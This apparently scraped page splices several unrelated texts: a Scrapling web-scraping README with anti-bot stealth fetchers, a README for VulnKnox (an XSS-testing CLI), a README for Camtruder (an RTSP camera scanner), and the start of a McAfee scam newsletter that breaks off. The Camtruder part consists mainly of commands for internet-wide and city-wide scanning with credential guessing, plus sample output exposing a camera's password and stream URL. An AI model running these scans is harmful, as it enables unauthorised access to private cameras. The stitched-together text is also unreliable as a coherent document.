All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.
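If you want a rough idea of how numbers like these are gathered, here is a minimal sketch (not the project's benchmarks.py) that times the same CSS selection 100 times and averages it:
import timeit
from scrapling.parser import Adaptor

# Build a small synthetic page and parse it once, so only the selection is timed
html = "<html><body>" + "<div class='product'>item</div>" * 500 + "</body></html>"
page = Adaptor(html, url="https://example.com")

runs = 100
total = timeit.timeit(lambda: page.css(".product"), number=runs)
print(f"average: {total / runs * 1000:.2f} ms per run")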
Scrapling is a breeze to get started with. Starting from version 0.2.9, it requires at least Python 3.9.
pip3 install scrapling
Then run this command to install the browser dependencies needed by the Fetcher classes:
scrapling install
If you have any installation issues, please open an issue.
Fetchers are interfaces built on top of other libraries with added features. They do requests or fetch pages for you in a single-request fashion and then return an Adaptor object. This feature was introduced because, previously, the only option was to fetch the page however you wanted and then pass it manually to the Adaptor class to create an Adaptor instance and start playing around with the page.
You might be slightly confused by now, so let me clear things up. All fetcher-type classes are imported in the same way:
from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher
All of them can take these initialization arguments: auto_match, huge_tree, keep_comments, keep_cdata, storage, and storage_args, which are the same ones you give to the Adaptor class.
If you don't want to pass arguments to the generated Adaptor
object and want to use the default values, you can use this import instead for cleaner code:
from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
then use it right away without initializing like:
page = StealthyFetcher.fetch('https://example.com')
Also, the Response object returned from all fetchers is the same as the Adaptor object, except it has these added attributes: status, reason, cookies, headers, history, and request_headers. All cookies, headers, and request_headers are always of type dictionary.
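For example, using the Fetcher shown above (httpbin.org is just a stand-in target), the added attributes can be read straight off the returned page:
>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://httpbin.org/get')
>> page.status           # HTTP status code, e.g. 200
>> page.reason           # e.g. 'OK'
>> page.cookies          # dict of cookies set by the server
>> page.headers          # dict of response headers
>> page.request_headers  # dict of the headers that were actually sent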
[!NOTE] The auto_match argument is enabled by default, and it's the one you should care about the most, as you will see later.
This class is built on top of httpx with additional configuration options. Here you can do GET, POST, PUT, and DELETE requests.
For all methods, you have stealthy_headers, which makes Fetcher create and use real browser headers and then create a referer header as if the request came from a Google search for this URL's domain. It's enabled by default. You can also set the number of retries with the retries argument for all methods, and httpx will retry requests if they fail for any reason. The default number of retries for all Fetcher methods is 3.
Note: all headers generated by the stealthy_headers argument can be overwritten by you through the headers argument.
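A quick sketch of both knobs together (httpbin.org is a stand-in target; the header value is arbitrary):
>> page = Fetcher().get('https://httpbin.org/get', retries=5)  # retry failed requests up to 5 times
>> page = Fetcher().get('https://httpbin.org/get', headers={'User-Agent': 'my-custom-agent'})  # overrides the generated header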
You can route all traffic (HTTP and HTTPS) to a proxy for any of these methods in this format http://username:password@localhost:8030
>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')
For Async requests, you will just replace the import like below:
>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')
This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.
>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection') # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True
Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)
This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.
>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)
Using this Fetcher class, you can make requests with:
1) Vanilla Playwright, without any modifications other than the ones you chose.
2) Stealthy Playwright, with the stealth mode I wrote for it. It's still a WIP, but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include patching the CDP runtime fingerprint, mimicking some real browser properties by injecting several JS files and using custom options, using custom flags on launch to hide Playwright even more and make it faster, and generating real browser headers of the same type and same user OS and appending them to the request's headers.
3) Real browsers, by passing the real_chrome argument or the CDP URL of your browser to be controlled by the Fetcher; most of the options can be enabled with it.
4) NSTBrowser's docker browserless option, by passing the CDP URL and enabling the nstbrowser_mode option.
Note: using the real_chrome argument requires that you have the Chrome browser installed on your device.
Add that to a lot of controlling/hiding options as you will see in the arguments list below.
This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
>>> quote.tag
'div'
>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>
>>> quote.parent.tag
'div'
>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]
>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>
>>> quote.children.css_first(".author::text")
'Albert Einstein'
>>> quote.has_class('quote')
True
# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'
# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'
If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below
for ancestor in quote.iterancestors():
# do something with it...
You can search for a specific ancestor of an element that satisfies a function. All you need to do is pass a function that takes an Adaptor object as an argument and returns True if the condition is satisfied or False otherwise, like below:
>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>
You can select elements by their text content in multiple ways, here's a full example on another website:
>>> page = Fetcher().get('https://books.toscrape.com/index.html')
>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>
>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'
>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]
>>> page.find_by_regex(r'£[\d\.]+') # Get the first element that its text content matches my price regex
<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>
>>> page.find_by_regex(r'£[\d\.]+', first_match=False) # Get all elements that matches my price regex
[<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]
Find all elements that are similar to the current element in location and attributes
# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]
# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19
# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]
To increase the complexity a little bit, let's say we want to get all the books' data using that element as a starting point:
>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
print({
"name": product.css_first('h3 a::text'),
"price": product.css_first('.price_color').re_first(r'[\d\.]+'),
"stock": product.css('.availability::text')[-1].clean()
})
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...
The documentation will provide more advanced examples.
Let's say you are scraping a page with a structure like this:
<div class="container">
<section class="products">
<article class="product" id="p1">
<h3>Product 1</h3>
<p class="description">Description 1</p>
</article>
<article class="product" id="p2">
<h3>Product 2</h3>
<p class="description">Description 2</p>
</article>
</section>
</div>
And you want to scrape the first product, the one with the p1
ID. You will probably write a selector like this
page.css('#p1')
When website owners implement structural changes like
<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>
The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.
from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1', auto_save=True)
if not element: # One day website changes?
element = page.css('#p1', auto_match=True) # Scrapling still finds it!
# the rest of the code...
How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.
Let's use a real website as an example and use one of the fetchers to fetch its source. To do this, we need to find a website that will change its design/structure soon, take a copy of its source, then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner, but that would make it a staged test haha.
To solve this issue, I will use The Web Archive's Wayback Machine. Here is a copy of StackOverflow's website in 2010, pretty old huh? Let's test if the auto-match feature can extract the same button in the old design from 2010 and the current design using the same selector :)
If I want to extract the Questions button from the old design I can use a selector like this #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a
This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions
>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'
Note that I used a new argument called automatch_domain. This is because, to Scrapling, these are two different URLs and hence two different websites, so it isolates their auto-match data. To tell Scrapling they are the same website, we pass the domain we want to use for saving the auto-match data for both, so Scrapling doesn't isolate them.
In a real-world scenario, the code would be the same, except it would use the same URL for both requests, so you won't need the automatch_domain argument. This is the closest example I can give to real-world cases, so I hope it didn't confuse you :)
Notes:
1. For the two examples above, I used the Adaptor class the first time and the Fetcher class the second time, just to show that you can create the Adaptor object yourself if you already have the source, or fetch the source using any Fetcher class and have it create the Adaptor object for you.
2. Passing the auto_save argument while the auto_match argument is set to False on the Adaptor/Fetcher object will only result in the auto_save value being ignored, along with the warning message: Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info. This behavior is purely for performance reasons, so the database gets created/connected only when you are planning to use the auto-matching features. The same applies to the auto_match argument.
3. The auto_match parameter works only for Adaptor instances, not Adaptors (lists), so if you do something like page.css('body').css('#p1', auto_match=True) you will get an error, because you can't auto-match a whole list. You have to be specific and do something like page.css_first('body').css('#p1', auto_match=True) instead.
Inspired by BeautifulSoup's find_all function, you can find elements using the find_all/find methods. Both methods can take multiple types of filters and return all elements in the page that all these filters apply to.
So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:
Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.
Examples to clear any confusion :)
>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]
# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]
# Find all elements that have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]
# Find all elements that contain the word 'world' in their content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]
# Find all span elements that match the given regex
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]
# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]
Here's what else you can do with Scrapling:
Access the lxml.etree object itself of any element directly:
>>> quote._root
<Element div at 0x107f98870>
Saving and retrieving elements manually to auto-match them outside the css and xpath methods, but you have to set the identifier yourself. To save an element to the database:
>>> element = page.find_by_text('Tipping the Velvet', first_match=True)
>>> page.save(element, 'my_special_element')
Then retrieve and relocate it later:
>>> element_dict = page.retrieve('my_special_element')
>>> page.relocate(element_dict, adaptor_type=True)
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]
>>> page.relocate(element_dict, adaptor_type=True).css('::text')
['Tipping the Velvet']
If you want to keep it as an lxml.etree object, leave out the adaptor_type argument:
>>> page.relocate(element_dict)
[<Element a at 0x105a2a7b0>]
Filtering results based on a function
# Find all products over $50
expensive_products = page.css('.product_pod').filter(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
# Find all the products with price '54.23'
page.css('.product_pod').search(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
Doing operations on element content is the same as Scrapy:
quote.re(r'regex_pattern')       # Get all strings (TextHandlers) that match the regex pattern
quote.re_first(r'regex_pattern') # Get the first string (TextHandler) only
quote.json()                     # If the content text is JSON-able, convert it to JSON using `orjson`, which is ~10x faster than the standard json library and provides more options
except that you can do more with them, like:
quote.re(
    r'regex_pattern',
    replace_entities=True,  # Character entity references are replaced by their corresponding character
    clean_match=True,       # Ignore all whitespaces and consecutive spaces while matching
    case_sensitive=False,   # Set the regex to ignore letter case while compiling it
)
Note: all of these are methods of the TextHandler that wraps the text content, so the same can be done directly if you call the .text property or an equivalent selector function.
Doing operations on the text content itself includes cleaning it:
quote.clean()
The regex methods above return TextHandler objects too, so in cases where you have, for example, a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to a JSON object, in other libraries this would take more than one line of code, but here you can do it in one line:
page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()
You can also sort all characters in the string as if it were a list and return the new string:
quote.sort(reverse=False)
To be clear, TextHandler is a sub-class of Python's str, so all normal operations/methods that work with Python strings will work with it.
Any element's attributes are not exactly a dictionary but a read-only sub-class of mapping called AttributesHandler, so it's faster, and the string values returned are actually TextHandler objects, so all the operations above can be done on them, along with standard dictionary operations that don't modify the data, and more :)
>>> for item in element.attrib.search_values('catalogue', partial=True):
        print(item)
{'href': 'catalogue/tipping-the-velvet_999/index.html'}
>>> element.attrib.json_string
b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'
>>> dict(element.attrib)
{'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}
Scrapling is under active development so expect many more features coming soon :)
There are a lot of deep details skipped here to keep this as short as possible, so to take a deep dive, head to the docs section. I will try to keep it as up to date as possible and add complex examples. There, I will explain points like how to write your own storage system, how to write spiders that don't depend on selectors at all, and more...
Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.
[!IMPORTANT] A website is needed to provide detailed library documentation.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free after all.
If you like Scrapling and want it to keep improving, this is a friendly reminder that you can help by supporting me through the sponsor button.
This section addresses common questions about Scrapling, please read this section before opening an issue.
How does the auto-matching work? You need to run your selector (css or xpath) with the auto_save parameter set to True at least once before structural changes happen. Now, because everything about the element can be changed or removed, nothing from the element itself can be used as a unique identifier for the database. To solve this issue, I made the storage system rely on two things: the URL of the page the element was selected from (which is what the automatch_domain argument overrides), and the identifier parameter you passed to the method while selecting. If you didn't pass one, the selector string itself is used as the identifier, but remember that you will have to use it as the identifier value later, when the structure changes and you want to pass the new selector. Together, both are used to retrieve the element's unique properties from the database later. When you later enable the auto_match parameter for both the Adaptor instance and the method call, the element's properties are retrieved, and Scrapling loops over all elements in the page, comparing each one's unique properties to the unique properties already stored for this element; a score is calculated for each one. Comparing elements is not exact but rather about how similar the values are, so everything is taken into consideration, even the order of values, such as the order in which the element's class names were written before and the order in which the same class names are written now. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned.
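To make that idea concrete, here is a rough conceptual sketch of such a similarity score in Python. This is not Scrapling's actual implementation; the property names and weights are illustrative assumptions only:
from difflib import SequenceMatcher

def similarity_score(stored: dict, candidate: dict) -> float:
    """Illustrative only: compare a few stored element properties
    against a candidate element and return a combined score."""
    score = 0.0
    # Tag name match is a strong signal
    if stored.get("tag") == candidate.get("tag"):
        score += 1.0
    # Text similarity (order-sensitive, like the comparison described above)
    score += SequenceMatcher(None, stored.get("text", ""), candidate.get("text", "")).ratio()
    # Attribute names/values similarity, with their order taken into account
    stored_attrs = [f"{k}={v}" for k, v in stored.get("attrib", {}).items()]
    cand_attrs = [f"{k}={v}" for k, v in candidate.get("attrib", {}).items()]
    score += SequenceMatcher(None, " ".join(stored_attrs), " ".join(cand_attrs)).ratio()
    return score

# The candidate element with the highest combined score would be returned.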
Not a big problem as it depends on your usage. The word default
will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you used the same identifier later for a different website that you didn't pass the URL parameter while initializing it as well. The save process will overwrite the previous data and auto-matching uses the latest saved properties only.
For each element, Scrapling will extract: - Element tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only). - Element's parent tag name, attributes (names and values), and text.
I passed the auto_save/auto_match parameter while selecting and it got completely ignored with a warning message. That's because passing the auto_save/auto_match argument without setting auto_match to True while initializing the Adaptor object will only result in ignoring the auto_save/auto_match argument value. This behavior is purely for performance reasons, so the database gets created only when you are planning to use the auto-matching features.
Auto-matching didn't find the element? It could be one of these reasons:
1. No data was saved/stored for this element before.
2. The selector passed is not the one used while storing the element's data. The solution is simple: pass the old selector again as an identifier to the method called; or retrieve the element with the retrieve method using the old selector as the identifier, then save it again with the save method and the new selector as the identifier; or start using the identifier argument more often if you plan to use every new selector from now on.
3. The website had some extreme structural changes, like a full redesign. If this happens a lot with this website, the solution is to make your code as selector-free as possible using Scrapling's features.
Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.
Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.
Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its state.
Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!
Please read the contributing file before doing anything.
[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the
robots.txt
file, for example.
This work is licensed under BSD-3
This project includes code adapted from: - Parsel (BSD License) - Used for translator submodule
VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine.
go install github.com/iqzer0/vulnknox@latest
Before using the tool, you need to set up your configuration:
API Key
Obtain your KNOXSS API key from knoxss.me.
On the first run, a default configuration file will be created at:
Linux/macOS: ~/.config/vulnknox/config.json
Windows: %APPDATA%\VulnKnox\config.json
Edit the config.json file and replace YOUR_API_KEY_HERE
with your actual API key.
Discord Webhook (Optional)
If you want to receive notifications on Discord, add your webhook URL to the config.json file or use the -dw flag.
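As a rough sketch of what that file might look like (the key names below are assumptions for illustration, not taken from the VulnKnox docs — check the generated file for the actual keys):
{
  "api_key": "YOUR_API_KEY_HERE",
  "discord_webhook": "https://discord.com/api/webhooks/your/webhook/url"
}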
Usage of vulnknox:
-u Input URL to send to KNOXSS API
-i Input file containing URLs to send to KNOXSS API
-X GET HTTP method to use: GET, POST, or BOTH
-pd POST data in format 'param1=value&param2=value'
-headers Custom headers in format 'Header1:value1,Header2:value2'
-afb Use Advanced Filter Bypass
-checkpoc Enable CheckPoC feature
-flash Enable Flash Mode
-o The file to save the results to
-ow Overwrite output file if it exists
-oa Output all results to file, not just successful ones
-s Only show successful XSS payloads in output
-p 3 Number of parallel processes (1-5)
-t 600 Timeout for API requests in seconds
-dw Discord Webhook URL (overrides config file)
-r 3 Number of retries for failed requests
-ri 30 Interval between retries in seconds
-sb 0 Skip domains after this many 403 responses
-proxy Proxy URL (e.g., http://127.0.0.1:8080)
-v Verbose output
-version Show version number
-no-banner Suppress the banner
-api-key KNOXSS API Key (overrides config file)
Test a single URL using GET method:
vulnknox -u "https://example.com/page?param=value"
Test a URL with POST data:
vulnknox -u "https://example.com/submit" -X POST -pd "param1=value1¶m2=value2"
Enable Advanced Filter Bypass and Flash Mode:
vulnknox -u "https://example.com/page?param=value" -afb -flash
Use custom headers (e.g., for authentication):
vulnknox -u "https://example.com/secure" -headers "Cookie:sessionid=abc123"
Process URLs from a file with 5 concurrent processes:
vulnknox -i urls.txt -p 5
Send notifications to Discord on successful XSS findings:
vulnknox -u "https://example.com/page?param=value" -dw "https://discord.com/api/webhooks/your/webhook/url"
Test both GET and POST methods with CheckPoC enabled:
vulnknox -u "https://example.com/page" -X BOTH -checkpoc
Use a proxy and increase the number of retries:
vulnknox -u "https://example.com/page?param=value" -proxy "http://127.0.0.1:8080" -r 5
Suppress the banner and only show successful XSS payloads:
vulnknox -u "https://example.com/page?param=value" -no-banner -s
[ XSS! ]: Indicates a successful XSS payload was found.
[ SAFE ]: No XSS vulnerability was found in the target.
[ ERR! ]: An error occurred during the request.
[ SKIP ]: The domain or URL was skipped due to multiple failed attempts (e.g., after receiving too many 403 Forbidden responses as specified by the -sb option).
[BALANCE]: Indicates your current API usage with KNOXSS, showing how many API calls you've used out of your total allowance.
The tool also provides a summary at the end of execution, including the number of requests made, successful XSS findings, safe responses, errors, and any skipped domains.
Contributions are welcome! If you have suggestions for improvements or encounter any issues, please open an issue or submit a pull request.
This project is licensed under the MIT License.
Camtruder is a high-performance RTSP camera discovery and vulnerability assessment tool written in Go. It efficiently scans and identifies vulnerable RTSP cameras across networks using various authentication methods and path combinations, with support for both targeted and internet-wide scanning capabilities.
Raw CIDR output for integration with other tools
Screenshot Capability
Configurable output directory
Location-Based Search
Raw output mode for scripting
Comprehensive Authentication Testing
Credential validation system
Smart Path Discovery
Automatic path validation
High Performance Architecture
Parallel connection handling
Advanced Output & Analysis
go install github.com/ALW1EZ/camtruder@v3.7.0
git clone https://github.com/ALW1EZ/camtruder.git
cd camtruder
go build
# Scan a single IP
./camtruder -t 192.168.1.100
# Scan a network range
./camtruder -t 192.168.1.0/24
# Search by location with detailed output
./camtruder -t london -s
> [ NET-ISP ] [ 192.168.1.0/24 ] [256]
# Get raw CIDR ranges for location
./camtruder -t london -ss
> 192.168.1.0/24
# Scan multiple IPs from file
./camtruder -t targets.txt
# Take screenshots of discovered cameras
./camtruder -t 192.168.1.0/24 -m screenshots
# Pipe from port scanners
naabu -host 192.168.1.0/24 -p 554 | camtruder
masscan 192.168.1.0/24 -p554 --rate 1000 | awk '{print $6}' | camtruder
zmap -p554 192.168.0.0/16 | camtruder
# Internet scan (scan till 100 hits)
./camtruder -t 100
# Custom credentials with increased threads
./camtruder -t 192.168.1.0/24 -u admin,root -p pass123,admin123 -w 50
# Location search with raw output piped to zmap
./camtruder -t berlin -ss | while read range; do zmap -p 554 $range; done
# Save results to file (as full url, you can use mpv --playlist=results.txt to watch the streams)
./camtruder -t istanbul -o results.txt
# Internet scan with limit of 50 workers and verbose output
./camtruder -t 100 -w 50 -v
Option | Description | Default |
---|---|---|
-t | Target IP, CIDR range, location, or file | Required |
-u | Custom username(s) | Built-in list |
-p | Custom password(s) | Built-in list |
-w | Number of threads | 20 |
-to | Connection timeout (seconds) | 5 |
-o | Output file path | None |
-v | Verbose output | False |
-s | Search only - shows ranges with netnames | False |
-ss | Raw IP range output - only CIDR ranges | False |
-po | RTSP port | 554 |
-m | Directory to save screenshots (requires ffmpeg) | None |
[ TR-NET-ISP ] [ 193.3.52.0/24 ] [256]
[ EXAMPLE-ISP ] [ 212.175.100.136/29 ] [8]
193.3.52.0/24
212.175.100.136/29
╭─ Found vulnerable camera [Hikvision, H264, 30fps]
├ Host : 192.168.1.100:554
├ Geo : United States/California/Berkeley
├ Auth : admin:12345
├ Path : /Streaming/Channels/1
╰ URL : rtsp://admin:12345@192.168.1.100:554/Streaming/Channels/1
This tool is intended for security research and authorized testing only. Users are responsible for ensuring they have permission to scan target systems and comply with all applicable laws and regulations.
This project is licensed under the MIT License - see the LICENSE file for details.
Made by @ALW1EZ
Welcome to the first edition of This Week in Scams, a new weekly series from McAfee breaking down the latest fraud trends, headlines, and real-time threats we’re detecting across the digital landscape.
This week, we’re spotlighting the FBI’s shocking new cybercrime report, the rise of AI-generated deepfakes, and a sophisticated Gmail impersonation scam flagged by Google. We’re also seeing a surge in location-specific toll scams and fake delivery alerts—a reminder that staying ahead of scammers starts with knowing how they operate.
Let’s dive in.
$16.6 Billion Lost to Online Scams in 2024
The FBI’s latest Internet Crime Report is here—and the numbers are staggering. Americans lost $16.6 billion to online scams last year, up from $12.5 billion in 2023. Older adults and crypto investors were hit especially hard, but the agency warns the real total is likely much higher, since many victims never report the crime.
Read more
AI-Powered Deepfake Scams Get More Convincing
Deepfake-enabled fraud has already caused more than $200 million in financial losses in just the first quarter of 2025.
McAfee researchers estimate the average American sees three deepfakes per day, many of which are designed to mimic real people, services, or news stories. Whether it’s fake crypto pitches, job offers, or social media stunts—seeing is no longer believing.
Read more
Google Warns Users of Sophisticated Email Scam
